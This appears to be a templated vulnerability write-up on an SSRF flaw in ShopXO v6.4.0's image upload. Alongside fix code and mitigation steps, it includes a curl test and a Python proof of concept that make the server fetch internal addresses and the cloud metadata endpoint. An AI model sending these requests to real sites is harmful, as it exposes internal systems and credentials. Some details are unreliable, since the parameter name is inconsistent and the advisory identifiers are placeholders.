ShopXO v6.4.0 fails to properly validate user-supplied URLs during image uploads, allowing attackers to craft malicious requests that bypass security checks. The application fetches external images without restricting access to internal network endpoints, enabling SSRF. Attackers can abuse this to scan internal systems, interact with local services, or exfiltrate sensitive data. The vulnerability arises due to insufficient input sanitization in the `image_upload.php` component, where a crafted `src` parameter forces the server to make arbitrary HTTP/HTTPS requests.
DailyCVE Form
Platform: ShopXO
Version: v6.4.0
Vulnerability: SSRF via Image Upload
Severity: Moderate
Date: 2025-03-29
What Undercode Say:
Exploitation:
1. Craft a malicious image URL pointing to internal endpoints (`http://localhost/admin`).
2. Upload via `image_upload.php` with the `src` parameter manipulated.
3. Server fetches internal resources, exposing sensitive data.
Protection:
1. Implement strict URL whitelisting for image sources.
2. Disable `allow_url_fopen` in PHP config.
3. Use network-level restrictions to block internal requests.
Analytics:
- Attack Vector: Remote, unauthenticated.
- Impact: Data disclosure, internal reconnaissance.
- Patch Status: Unpatched in v6.4.0.
Commands:
Check if vulnerable (curl test):
```shell
curl -X POST -F "image=http://internal-ip/admin" http://shopxo/image_upload.php
```
Code Fix (PHP):
```php
// Validate external URLs before processing
function isAllowedURL($url) {
    // Allowlist of permitted image hosts (placeholder value; the real list is deployment-specific)
    $whitelist = ['cdn.example.com'];
    $parsed = parse_url($url);
    if ($parsed === false || !isset($parsed['scheme'], $parsed['host'])) {
        return false;
    }
    if (!in_array(strtolower($parsed['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // A host allowlist alone does not stop DNS rebinding; also pin the resolved IP when fetching
    return in_array(strtolower($parsed['host']), $whitelist, true);
}
```
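The same allowlist idea carried one step further, as an added example that is not ShopXO's code: besides scheme and host checks it resolves the host and rejects any answer in a loopback, private, link-local (including the 169.254.169.254 metadata address) or IPv4-mapped range. The allowed hosts and the injectable resolver are assumptions made for this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical allowlist of image hosts; the real configuration is deployment-specific.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com", "images.example.com"}


def _resolve(host):
    """Default resolver: every A/AAAA record for the host (all of them must be checked)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_blocked_ip(ip_str):
    """True for loopback, private, link-local, reserved, unspecified or multicast addresses."""
    ip = ipaddress.ip_address(ip_str)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    return (not ip.is_global) or ip.is_multicast


def validate_image_url(url, resolve=_resolve):
    """Return (ok, reason). Only http/https, an allowlisted host, and public IPs are accepted."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not http/https"
    host = parts.hostname  # already lower-cased by urlsplit
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"  # blocks allowed-host@evil-host confusion
    if host not in ALLOWED_IMAGE_HOSTS:
        return False, "host not allowlisted"  # raw IPs such as 169.254.169.254 stop here
    try:
        addrs = resolve(host)
    except OSError:
        return False, "unresolvable host"
    for addr in addrs:
        if is_blocked_ip(addr):
            return False, f"{host} resolves to non-public address {addr}"
    # The fetch itself should connect to one of the addresses checked here,
    # otherwise a second lookup at fetch time re-opens the DNS-rebinding window.
    return True, "ok"
```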
Mitigation Steps:
1. Update to ShopXO patched version (if available).
2. Deploy WAF rules to block SSRF patterns.
3. Audit server logs for suspicious outbound requests.
Exploit PoC:
```python
import requests

target = "http://vulnerable-shopxo.com/image_upload.php"
malicious_url = "http://169.254.169.254/latest/meta-data"
requests.post(target, files={"image": (None, malicious_url)})
```
Log Analysis:
```shell
grep "image_upload.php" /var/log/apache2/access.log | grep "169.254.169.254"
```
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- NVD: CVE-2025-XXXX
- Reported By: https://github.com/advisories/GHSA-p736-g6pg-hjhw
Extra Source Hub:
Undercode